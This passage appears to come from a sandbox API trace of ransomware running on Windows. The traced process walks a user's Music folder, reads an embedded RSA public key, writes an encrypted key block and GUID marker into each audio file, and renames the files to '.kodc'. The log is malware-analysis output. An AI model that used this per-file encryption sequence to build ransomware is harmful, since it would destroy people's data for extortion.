HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\G4Lm5aAbySbM65.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\g4lm5aabysbm65.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0102.096] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=7748) returned 1 [0102.096] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0102.100] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1e1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.100] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0102.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.101] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.101] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1e44, lpOverlapped=0x0) returned 1 [0102.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0102.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.102] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0102.103] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0102.103] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0102.103] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0102.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0102.103] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0102.103] GetLastError () returned 0x0 [0102.104] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0102.104] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0102.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.104] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0102.104] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0102.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.104] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0102.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1e40) returned 0x9ba8d90 [0102.104] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0102.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0102.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb66b8 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6700 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8280 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8298 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0102.105] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0102.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0102.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8298 | out: hHeap=0x630000) returned 1 [0102.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0102.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0102.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8298 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8280 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0102.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0102.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8298 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0102.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0102.107] GetCurrentThreadId () returned 0x42c [0102.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0102.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x332caf8 [0102.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.108] GetCurrentThreadId () returned 0x42c [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0102.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0102.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0102.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8280 [0102.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0102.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0102.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8298 [0102.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0102.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0102.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0102.110] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1e44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.110] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0102.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0102.111] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0102.111] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0102.111] CloseHandle (hObject=0x5cc) returned 1 [0102.112] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\G4Lm5aAbySbM65.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\g4lm5aabysbm65.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\G4Lm5aAbySbM65.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\g4lm5aabysbm65.wav.kodc")) returned 1 [0102.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8980 | out: hHeap=0x630000) returned 1 [0102.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.113] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0102.115] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e575a0, ftCreationTime.dwHighDateTime=0x1d5ba25, ftLastAccessTime.dwLowDateTime=0xe71a5e10, ftLastAccessTime.dwHighDateTime=0x1d5b85a, ftLastWriteTime.dwLowDateTime=0xe71a5e10, ftLastWriteTime.dwHighDateTime=0x1d5b85a, nFileSizeHigh=0x0, nFileSizeLow=0x4a36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="giiOzOC5.m4a", cAlternateFileName="")) returned 1 [0102.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\giiOzOC5.m4a") returned=".m4a" [0102.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\giiOzOC5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\giiozoc5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0102.115] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=18998) returned 1 [0102.115] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0102.119] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4a10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.119] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0102.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.120] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.120] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4a36, lpOverlapped=0x0) returned 1 [0102.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0102.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.121] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0102.122] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0102.122] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0102.122] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0102.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0102.122] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0102.122] GetLastError () returned 0x0 [0102.122] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0102.122] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0102.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.122] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0102.122] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0102.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.123] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0102.123] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0102.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0102.123] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4a36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.124] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0102.124] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0102.124] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0102.124] CloseHandle (hObject=0x5cc) returned 1 [0102.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0102.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0102.125] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\giiOzOC5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\giiozoc5.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\giiOzOC5.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\giiozoc5.m4a.kodc")) returned 1 [0102.127] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44365ad0, ftCreationTime.dwHighDateTime=0x1d5bcd0, ftLastAccessTime.dwLowDateTime=0x3d085c80, ftLastAccessTime.dwHighDateTime=0x1d5bed4, ftLastWriteTime.dwLowDateTime=0x3d085c80, ftLastWriteTime.dwHighDateTime=0x1d5bed4, nFileSizeHigh=0x0, nFileSizeLow=0x15e1f, dwReserved0=0xa0000003, 